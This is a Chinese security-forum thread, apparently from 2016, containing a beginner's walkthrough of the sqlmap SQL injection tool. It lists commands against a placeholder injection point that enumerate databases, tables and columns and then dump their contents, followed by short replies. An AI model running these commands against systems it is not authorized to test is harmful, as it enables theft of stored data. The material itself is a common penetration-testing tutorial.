查看: 12027|回复: 7

菜鸟如何使用SQLMAP

[复制链接]
发表于 2016-1-10 22:53:56 | 显示全部楼层 |阅读模式
以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

      SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
     使用快捷方式启动
1.jpg
2.  
     现做如下假设   
                             1. 已经安装Python2.7 并已经添加了环境变量
                             2. 已经下载了SQLMAP
                             3. 会使用cmd命令行
                                                      我知道你们都是大牛
3.
     打开要在sqlmap的目录里
2.jpg

注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了


**************************************


sqlmap.py -u "注入点" //会判断数据库类型,服务操作系统、脚本类型 前后有双引号
3.jpg


03服务器 / asp.net / ms sql 2008


sqlmap.py -u "注入点" --dbs //列数据库 按上键
  
4.jpg




sqlmap.py -u "注入点" -D 数据库名 --tables  //列出表名


5.jpg


sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns  //猜字段

6.jpg


sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容



7.png

评分

参与人数 2i币 +7 收起 理由
Mrlin + 2 不是太详细 但也不错;
C4r1st + 5

查看全部评分

回复

使用道具 举报

发表于 2016-1-11 08:57:47 | 显示全部楼层
我不是大牛@_@
回复 支持 反对

使用道具 举报

发表于 2016-1-11 09:28:08 | 显示全部楼层
完全看不懂的说
回复 支持 反对

使用道具 举报

发表于 2016-1-11 14:31:08 | 显示全部楼层
哪里恶心头疼了
回复 支持 反对

使用道具 举报

发表于 2016-1-11 17:12:02 | 显示全部楼层
不错不错,终于学会了
回复 支持 反对

使用道具 举报

发表于 2016-1-12 14:36:44 | 显示全部楼层
只是一些非常初级的东西,详细的推荐大家去freebuf
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2016-1-13 12:23:53 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2016-2-12 10:28:47 | 显示全部楼层
觉得很好呢
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-2 06:37 , Processed in 0.217337 second(s), 25 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部